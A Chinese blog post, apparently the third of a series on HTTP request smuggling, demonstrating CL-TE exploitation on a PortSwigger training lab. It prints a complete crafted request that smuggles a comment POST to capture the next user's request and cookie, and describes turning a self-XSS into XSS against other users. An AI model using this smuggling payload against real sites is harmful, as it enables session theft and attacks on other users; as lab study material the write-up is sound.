http走私漏洞学习(3)--http走私漏洞利用

http走私漏洞学习(1)--http走私简介
http走私漏洞学习(2)--http走私常见方法
http走私漏洞学习(3)--http走私漏洞利用

靶场地址:https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

以cl-te方式为例,简单演示漏洞利用

留言处窃取请求数据

随意留言抓包,修改数据包
POST / HTTP/1.1
Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Connection: close
Content-Length: 886
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net/post?postId=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ChTrMNa7wvzEl67A3hXnHGlHK9bhoVXG
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Connection: close
Content-Length: 1020
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net/post?postId=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ChTrMNa7wvzEl67A3hXnHGlHK9bhoVXG

csrf=9TwQhCEYJGWu3I65LSTEZjdVRHBuOzdk&postId=4&name=11111&email=test%40163.com&website=&comment=

走私数据中CL的值需要根据具体情况调节大小,才能看到cookie
提交数据,‘0’以下的数据会走私到下一个数据包中
下一个数据包将被拼合成:

POST /post/comment HTTP/1.1
Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
.....
csrf=9TwQhCEYJGWu3I65LSTEZjdVRHBuOzdk&postId=4&name=11111&email=test%40163.com&website=
&comment=POST /post/comment HTTP/1.1
xxxx

comment为留言数据,意味着走私后下一个数据包的内容将显示在留言中

现在我们将数据包提交,回到留言处随意输入东西

显示出错,刷新一下

下一个用户数据包内容显示在留言中,成功看到cookie

靶场地址:


有一处隐藏的input带有UA

尝试修改UA,插入xss,
触发js代码,典型的我打我自己型xss

利用http走私弄成我打别人型xss



提交后随意刷新页面,触发xss

总的来说利用的局限性很大,攻击到谁完全就是随缘

你可能感兴趣的:(http走私漏洞学习(3)--http走私漏洞利用)